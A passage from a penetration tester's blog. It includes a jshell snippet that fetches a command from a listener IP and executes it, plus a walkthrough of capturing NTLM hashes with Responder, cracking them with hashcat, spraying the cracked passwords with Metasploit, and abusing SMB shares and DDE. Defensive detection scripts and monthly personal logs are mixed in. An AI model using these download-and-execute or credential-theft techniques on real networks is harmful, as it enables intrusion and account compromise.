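            "severity": severity, "cmd": cmd}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify over a batch of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


# Constructed sample events; 192.168.45.129 is the listener address from the post.
EVENTS = [
    {"Computer": "ws01", "Image": r"C:\Program Files\Java\jdk-17\bin\jarsigner.exe",
     "CommandLine": r"jarsigner.exe -J-Xloggc:\\192.168.45.129\test"},
    {"Computer": "ws01", "Image": r"C:\Program Files\Java\jdk-17\bin\jar.exe",
     "CommandLine": r"jar -v -t --file=\\192.168.45.129\test"},
    {"Computer": "ws02", "Image": r"C:\Program Files\Java\jdk-17\bin\javac.exe",
     "CommandLine": r"javac -d C:\build\out C:\src\Main.java"},
    {"Computer": "ws02", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe \\fileserver\docs\notes.txt"},
    {"Computer": "ws03", "Image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "CommandLine": r"javaw -Xlog:gc:file=\\192.168.45.129\test"},
]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(f"[{finding['severity']}] {finding['host']}: {finding['tool']} -> {finding['unc']}")
```

Ordinary programs opening UNC paths (the notepad record) are normal and deliberately not flagged; the signal is Java tooling being pointed at a share it has no business writing a GC log to.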

As always experiment on your own computer before attempting the technique on a victim’s PC. That nugget of advice is pure gold and will save you thousands of wasted hours.

jshell is my new favourite thing

This command was new to me and its name immediately stood out as potentially useful. This makes Java an interpreted language!!! You can write whatever Java you want and it executes it exactly the same way as using the Python interpreter for example:

InputStream inputStream = new URL("http://192.168.45.129/test").openStream();
String cmd = new BufferedReader(new InputStreamReader(inputStream)).lines().collect(Collectors.joining("\n"));
Process proc = Runtime.getRuntime().exec(cmd);
String result = new BufferedReader(new InputStreamReader(proc.getInputStream())).lines().collect(Collectors.joining("\n"));

The above will download a file over HTTP and save the contents of the file into the “cmd” String. It will then run that command and save the output to the “result” string. The screenshot below shows this operating:

Using jshell

I saved the command “whoami” in the “test” file which was then served using a python HTTP listener like this:

python -m SimpleHTTPServer 80

You can see that above in the line saying cmd ==> “whoami”.

Additionally, you can store Java commands in a .jsh file and then have them execute as shown:

jshell whatever.jsh

If you save the above example into “whatever.jsh” it will run the commands blindly and you won’t see what was run. If you type “result” though, the output from the command will be there. This puts your payload on disk where it is more likely to be gobbled by AV.

There is a nice tutorial for jshell here. To me this has the same impact as “jrunscript” and “jjs” did before for Nashorn. Only now you are writing payloads in Java instead of JavaScript.

This thing is gorgeous and I love it because it is another scripting language essentially and one which may be a blind spot.

Captain’s Log: July 2021

Here is how I did in the new condensed table format.

Target | Summary
11k steps a day | I hurt my ankle in March. I have basically given myself a free pass and seen my health decline as a result. Now I am back to doing more exercise. Mixing YouTube videos with the kids and other activity. I have seen my steps back up to around the 10k a day mark. This is progress but it is slow. Then right at the end of the month my ankle has started hurting again. Time to get a GP involved.
150 active minutes per week | Start of July was a nightmare in terms of hay fever. I figure better cardio health is probably a good tool for bad days. So I have resolved to increase this again. Now the battle is getting what Fitbit determines to be “Active Zone” minutes. Several times I have been out murdering parts of the garden dripping with sweat only to find that hour didn’t count. Logically I was definitely working hard. Not sure how to be measuring this now.
1 technical blog a month | I have failed to achieve this.
Support my partner to exercise | They stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings.
Record five songs | I did not make anything ready to release. I have acquired a new DAW (Reaper) but have not had time to go through any tutorials for it. This is in the wake of Audacity going to the dogs and because I never quite got along with Ableton Live Lite which I have used before. I have done a lot of playing guitar in the garden but have not recorded anything.
OSWE | I’ll be honest I think this is a Winter time activity.
Panic Attacks | I had the start of a panic attack after gardening and probably reacting badly to all of the pollen. When you cannot breathe that is a good time to start a panic in my opinion. I got over it pretty quickly.

We went to Edinburgh for a weekend and the start of the drive definitely had me feeling the panic rising. This is possibly because I have not been further than 3 miles all pandemic. The hotel was worryingly about 5 degrees C hotter inside than outside in a heat wave. I have sensitivity around being too hot and if I cannot cool down then I am not really able to relax. Eventually we did what we had booked before we arrived and then checked out as soon as possible and went home. The thought of a second night not sleeping in the furnace of a room was not great.

Other bits

  • Research – Having cleared the Fedena stuff I finally went hunting for more CVEs. As part of a team at work we have found 10 new CVE worthy vulnerabilities in another bit of Open Source software. The vendor has been responsive (result!) and hopefully I can turn this around in way less than 12 months to disclosure like Fedena was. There is scope for a blog and a talk at DC44141 for September IF they can get the patches out in time.
  • Euro 2020 – What an amazing tournament this was. I really enjoyed it. Scotland’s cameo showed we needed a striker but that is life. Our players have experience now so let’s go for more qualifications.
  • Audiobooks 1 – as I have picked up the exercise and steps again I have finally completed Stealing Light: Shoal, Book 1 by Gary Gibson. This was really entertaining and had some nice ideas in there. I am now a couple of hours into the second book in the series.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Movies – We watched Parasite. It was a fun couple of evenings (because parents can rarely watch a film in one sitting).
  • Family – I have made an effort to ensure each day has fun for me, fun for me and the kids, and fun for me and my partner. I think the pandemic really had done a number on my happiness. This seems to be the way to go. We went on a trip to Edinburgh (the first time I have gone more than 3 miles since lockdown 1). This was largely a success.
  • Outside 1 – We travelled more than 3 miles for the first time since lockdown 1. We went to Edinburgh to see the Ray Harryhausen exhibit. I thoroughly recommend it if you have enjoyed any of his movies growing up. It has many models that made me go *squee*. Highlight of the trip for the kids was a go in a swimming pool at the hotel. This was a great weekend because I didn’t have a major freak out and this is progress. It gets easier as the kids get bigger.
  • Outside 2 – Last weekend of July we went to the Glasgow Science Centre. This is always a joyous experience and you should also give that a go. The soft play part on the middle floor is closed (probably because Covid would make that a nightmare to police). There is still oodles to see and do. We gave the cafe a go and rate it pretty highly.

That is the log for July.

Captain’s Log: June 2021

Here is how I did in the new condensed table format.

Target | Summary
11k steps a day | I hurt my ankle in March. I am out of this game for the foreseeable.
150 active minutes per week | I am not getting “active” minutes (on the Fitbit scale) on the exercise bike to the same degree I was from jogging. But I am doing 20 minutes at least 3 times a week. I am going out for walks with the kids and gardening at the weekends. None of this is seemingly counting on the Fitbit scale. I am working on getting back to activity; it feels closer.
1 technical blog a month | Success. I documented the basics of attacking an internal network using Responder, Hashcat, Metasploit, Bloodhound and CrackMapExec. It was a giddy thrill that this was apparently shared by threat actors enough to wind up in threat intelligence feeds. Which is bemusing for entry level tooling and techniques that have been around for years.
Support my partner to exercise | They stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to go to visitor attractions again like the world class museums in Glasgow.
Record five songs | I have recorded heaps of short ideas. Mostly on the guitar sat out in the sunshine. Some of them I can see me converting into 2-3 minute items.
OSWE | I’ll be honest I think this is a Winter time activity.
Panic Attacks | I have avoided them again this month.

Other bits

  • Research – I was not able to talk about this last month but the Fedena research finally came out. My team and I found seven vulnerabilities in this school management software. It took over a year from discovery to posting. This was picked up by The Daily Swig, which was nice! Getting clear of this has given me a boost to go find some more bugs. The technical details for the authentication bypass CVE-2021-27980 are out for reading. Or just the short video of the PoC:

  • Euro 2020 – I cannot adequately put into words how excited I was for this. I barely watch football these days but I just love these tournaments. The fact that Scotland were at the party just made it all the more exciting. The build up to the first game was fantastic and I was singing through the entire game. It doesn’t matter that Scotland exited early. We actually played pretty well. I would say that was pretty much the tale for our tournament in the end. We played well. We created chances. But we couldn’t take them and that was the end of that.
  • Audiobooks 1 – technically still on Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. But without much exercise or walking occurring these days my time has been limited.
  • Television 1 – Star Trek Voyager. I have completed this and it honestly stands up quite well. Last time I watched it there were far more episodes I wanted to skip. This time I was ok with most of it. Some excellent Star Trek in here.
  • Television 2 – Brooklyn 99. After Voyager I fell back into season 7 of this. What a lovingly made show this is. Captain Raymond Holt going badass over his fluffy boy being kidnapped is a total highlight.
  • House – We booked someone to come replace the bathroom sink and they have not done so yet. We have sort of been stuck waiting on that as we are trying to do things in a set order.
  • Garden – Has paid out strawberries twice already this summer. I have had horrific hay fever (the worst I have ever had) but I have still been able to murder the lawn appropriately so hopefully I will learn to get that done more effectively to minimise the impact. I have been out the back in a Darth Vader style breathing mask but that didn’t actually reduce the symptoms after cutting the grass. Answers on a post card (or comment) welcome.

That is the log for June.

Grabbing NTLM hashes with Responder then what?

Local networks have lots of things on them that we as penetration testers can exploit. In a Windows environment there are often protocols (LLMNR and NBT-NS) which are easily exploitable. Effectively you are running a man-in-the-middle attack and using that to intercept traffic being sent by users in order to capture their hashed password.

To do this you need to be in control of a machine in the LAN which for us usually means our laptop, or a VM if the customer is enabling remote testing via a VPN.

Running Responder

For years the tool of choice has been Responder.

If you are doing this on a remote server rather than your laptop then you should first launch “tmux”. I have blogged about persistent SSH sessions before. The super tl;dr version is this:

tmux new -s <session name>
tmux new -s responder

If you get disconnected you will need to re-establish your SSH connection. Then you can reattach:

tmux attach -t <session name>
tmux attach -t responder

It is worth your energy to learn more about tmux:

As for running responder it is as simple as this:

responder -I <interface>
responder -I eth0

It is capable of many more things such as prompting users with fake prompts to obtain plaintext passwords. In this default configuration it will find LLMNR and NBT-NS traffic. It will respond on behalf of the servers the victim is looking for and capture their NTLM hashes.

These hashes have to be cracked using brute-force before they can be used. This is in contrast to the NTLM hashes you may pull out of the registry (the SAM) for local Windows accounts, which can be used directly with pass-the-hash.

Responder Log Files

As responder runs it saves detailed logs in this folder:

/usr/share/responder/logs

For each captured hash there will be a file like “SMB-NTLMv2-SSP-<ip>.txt”. This will contain hashes intended for that host. There will be repeated hashes for the same account because you will have likely captured the same user multiple times.

For completeness you may want to try cracking every different hash because what if the victim had typed their credentials incorrectly? In practice when you have hundreds of unique user hashes the risk of that is pretty minimal. If you want to crack all the things take all of these “SMB-NTLMv2-SSP-<ip>.txt” files and run them through hashcat (shown later).

When I have hundreds of hashes, the file I work with is “Responder-Session.log”. This is equivalent to what the tool spits out to the terminal as it captures things. To use this I use a bash loop to extract the first hash for each username.

Bash Loop To Extract Unique Hashes

First we need to list the unique usernames we have captured:

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

Some points about this:

  • The sort command uses “-u” (unique) and “-f” (case insensitive).
  • Cut is wonderful at splitting a line of output which has delimiters in it, allowing you to select specific columns from the results. Using “-f 4-6” we say our username also carries its domain, i.e. “cornerpirate::DOMAIN”. This means that if the same username exists across domains then you are going to include both.
  • The awk command trims the leading whitespace; without it each username would have one space in front of it.

For each username we need to obtain the first NTLMv2 hash and save it into a file:

for user in $(strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1')
do
  echo "[*] search for: $user"
  # -F treats "user::DOMAIN" literally (no regex metacharacters), -i keeps the match case insensitive
  strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -iF "$user" | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done

The results are saved into “ntlm-hashes.txt”. Note that it uses “>>” to redirect into that file. This means that if you run this loop again you will see duplicate hashes being added. So remember to delete the file before running the loop again.

Apart from that the only difference is that the cut command is getting all columns “4-10” instead of just “4-6” (the username and domain), and the use of “head -n 1” to just get the first occurrence of that user’s hash.

I have added the “echo” command so that you are certain it is doing its job. Otherwise this loop can take some time and you might get concerned.

For most intents and purposes this for loop will get you enough hashes to go attack.

Hashcat command to crack NTLMv2 Hashes

On an x64 Windows system your command is this:

hashcat64.exe -m 5600 <hashes file> <wordlist> -o <output file>
hashcat64.exe -m 5600 ntlm-hashes.txt Rocktastic12a -o cracked.txt

The “Rocktastic12a” is available for download from Nettitude. At around 13GB this is a reasonable wordlist that doesn’t go overboard at eating disk space. It is useful for most situations.

When hashes get cracked they will be saved in the output file (cracked.txt) where you can extract them for use.

Spraying Cracked Passwords using Metasploit

Metasploit includes the “smb_login” module which is usually used for password brute force attacks. It also has a “USERPASS_FILE” option as described below:

When making login attempts we need to also set the “SMBDomain” value appropriately. Before we get ahead of ourselves we need to determine how many domains we have credentials for:

cat cracked.txt | cut -d ":" -f 3 | sort -u -f

This will spit out an alphabetised list of domains that you have cracked hashes for. You will need to create one “USERPASS_FILE” for each domain. The following loop will do what you need:

for domain in $(cut -d ":" -f 3 cracked.txt | sort -u -f)
do
  # match the domain field only ("::DOMAIN:") rather than the name appearing anywhere on the line
  grep -i "::${domain}:" cracked.txt | cut --output-delimiter=' ' -d ":" -f 1,7 >> "userpass_${domain}.txt"
done

The output will be stored in one or more txt files called “userpass_*.txt”.

For each target domain you now do this as the options into “smb_login”:

set SMBDomain <DOMAINNAME>
set USERPASS_FILE /path/to/userpass_domain.txt

Before hitting “exploit” you are going to need to tell Metasploit which hosts to log into using the “RHOSTS” option. As I am assuming you are on a legitimate penetration test you can be noisy on the network. You would NOT be doing this kind of thing on a red team engagement where you are being tasked with avoiding detection.

The “major yolo” is to spam these creds at literally every host that speaks SMB on TCP port 445. A single IP suddenly logging in across the network with multiple accounts would be like setting off a bunch of fireworks for the Blue Team to see. This is why you would only do this on a Pentest and not where you needed to be subtle.

The “minor yolo” is to look into the responder logs folder and extract the IP addresses people were logging onto. These systems give you a high degree of certainty that the credentials are valid ahead of time.

However you do it, set your “RHOSTS” appropriately and then type “exploit”. This will tell you a list of credentials that were valid. It will also populate Metasploit’s database of compromised credentials which you can access via the “creds” command. You should definitely get comfortable using creds because it is a massive bonus having a queryable list of known valid credentials during an engagement.
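The “fireworks” the post says the Blue Team would see from that smb_login spray can be written down as a rule: one source address authenticating as many different accounts to many different hosts inside a short window. This is an added example, not part of the original post; it runs over constructed logon records (timestamp, target host, account, source IP, result, the fields an analyst would lift from centrally collected 4624/4625 events) and counts successful logons as well as failures, because a spray of cracked passwords mostly succeeds.

```python
"""Detect one source address logging on as many accounts to many hosts.

Added example, not from the original post. The log lines below are constructed
and the thresholds are starting points to tune per environment.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(minutes=10)   # sliding window per source IP
MIN_ACCOUNTS = 5                  # distinct accounts seen from one source
MIN_HOSTS = 5                     # distinct target hosts seen from one source

# Constructed sample: one network logon per line. 10.10.5.7 behaves like the
# spray; 10.10.1.2 is a monitoring account touching many hosts with ONE identity.
SAMPLE_LOG = r"""
2021-06-01T09:00:01 host=fs01 user=CORP\alice src=10.10.5.7 result=success
2021-06-01T09:00:03 host=ws02 user=CORP\bob src=10.10.5.7 result=success
2021-06-01T09:00:05 host=ws03 user=CORP\carol src=10.10.5.7 result=success
2021-06-01T09:00:09 host=sql01 user=CORP\dave src=10.10.5.7 result=failure
2021-06-01T09:00:12 host=dc01 user=CORP\erin src=10.10.5.7 result=success
2021-06-01T09:00:15 host=print01 user=CORP\frank src=10.10.5.7 result=success
2021-06-01T09:01:00 host=fs01 user=CORP\svc_monitor src=10.10.1.2 result=success
2021-06-01T09:01:01 host=ws02 user=CORP\svc_monitor src=10.10.1.2 result=success
2021-06-01T09:01:02 host=ws03 user=CORP\svc_monitor src=10.10.1.2 result=success
2021-06-01T09:01:03 host=sql01 user=CORP\svc_monitor src=10.10.1.2 result=success
2021-06-01T09:01:04 host=dc01 user=CORP\svc_monitor src=10.10.1.2 result=success
2021-06-01T09:05:00 host=fs01 user=CORP\bob src=10.10.20.8 result=success
2021-06-01T09:06:30 host=ws02 user=CORP\bob src=10.10.20.8 result=failure
""".strip().splitlines()


def parse(line: str) -> Dict[str, object]:
    """Turn one 'timestamp key=value ...' record into a dict with a datetime."""
    ts, rest = line.split(" ", 1)
    fields: Dict[str, object] = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts)
    return fields


def load_sample() -> List[Dict[str, object]]:
    return [parse(line) for line in SAMPLE_LOG]


def detect_spray(events, window=WINDOW, min_accounts=MIN_ACCOUNTS, min_hosts=MIN_HOSTS):
    """Return {source_ip: summary} for every source whose logons within any
    window of the given length touch >= min_accounts accounts and >= min_hosts hosts.
    Success and failure are both counted: cracked creds produce 4624s, not 4625s."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_src[str(ev["src"])].append(ev)
    alerts: Dict[str, Dict[str, object]] = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits inside `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            chunk = evs[start:end + 1]
            accounts = {str(e["user"]).lower() for e in chunk}
            hosts = {str(e["host"]).lower() for e in chunk}
            if len(accounts) < min_accounts or len(hosts) < min_hosts:
                continue
            # Keep the widest qualifying window seen for this source.
            if src not in alerts or len(chunk) > alerts[src]["attempts"]:
                alerts[src] = {
                    "accounts": len(accounts),
                    "hosts": len(hosts),
                    "attempts": len(chunk),
                    "successes": sum(e["result"] == "success" for e in chunk),
                    "first": chunk[0]["ts"].isoformat(),
                    "last": chunk[-1]["ts"].isoformat(),
                }
    return alerts


if __name__ == "__main__":
    for src, summary in detect_spray(load_sample()).items():
        print(f"[ALERT] {src}: {summary}")
```

Dropping min_accounts to 1 would also flag the monitoring account, which is the usual tuning trade-off: the account-count threshold is what separates a spray from legitimate tooling that fans out under a single identity.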

Now what?

To recap we have gone from the perspective of an attacker on the LAN without any knowledge or passwords to a point where we have found valid domain credentials.

If you are lucky then some of the compromised credentials will already have elevated privileges and then you are pretty much done. Recently I had 250-ish compromised accounts but every single one of them was only in the “Domain Users” group. So for the rest, assuming we have only those permissions, what can we do?

Domain Reconnaissance with Bloodhound

Bloodhound is fantastic. When you have access to a domain account you can gather data from your machine using this python script:

python3 bloodhound.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -gc <DOMAIN_CONTROLLER_ADDRESS> -c all

If you have an interactive shell on a machine already then you can also use various other “ingestor” scripts.

This will create a bunch of .json files in the current working directory. There are plenty of blogs out there describing how to install the Bloodhound user interface. However, many of those are outdated in 2021 because it was previously more difficult. There is now an apt package so using Docker is no longer the simplest route (although a container is ephemeral, which may be useful if you need to avoid caching customer data).

Install neo4j:

apt-get install neo4j

Then run that using this:

neo4j console

Follow the instructions spat out to the terminal. This will require you to use a web browser to set up a database with a username and password. You will need to know these credentials so that Bloodhound can use neo4j later.

Next install bloodhound:

apt-get install bloodhound

So long as neo4j is running all you need to do is run your new command “bloodhound” at the terminal and enter your neo4j credentials and you are away!

Import those json files and then explore the UI to discover juicy information about the domain. You can use this to confirm how many users are in the “Domain Admins” group, what machines they are logged into, and loads more things.

Inspect SMB Shares

CrackMapExec is an amazing tool. This lets you specify a set of credentials and then blast through an entire network to determine what SMB shares they can access. It is often the case that insecure file permissions exist on these shares.

Prioritise exploring any share where you have write access. If that share has executables (.msi, .exe, .bat, .ps1 etc) then you have a chance to modify them. Doing so will give you an easy privilege escalation vector since the victim would execute the code you have supplied. Warning: do not do this without your customer’s permission.

If you have read access to any configuration files then go hunting for plain-text credentials. These will obviously give you lateral movement opportunities. It is common to gain access to databases using this technique.

If you have access to documents then go looking for juicy content. If there is an Excel file that is heavily accessed then consider using dynamic data exchange (DDE) to execute commands on the PCs of other users. Warning: this will prompt victims with security warnings before code executes, again do this with customer permission.

The documentation for CrackMapExec is fantastic. You can use it to do wonderful things so I recommend it with all my heart.

Then what?

I had to stop the journey somewhere. That is basically now. You should have gained access to significant resources by this point. You need to keep detailed notes as you did this so that you know exactly how you obtained which permissions or levels of access. The customer is going to thank you if the report is super clear about what you accessed and how you got there.

I make an appendix in my report called “Route to Domain Admin” where I start from the initial point and then as I progress through the levels of privilege I explain how. There may be several ways to do a certain step so you need to document them too.

Happy hunting.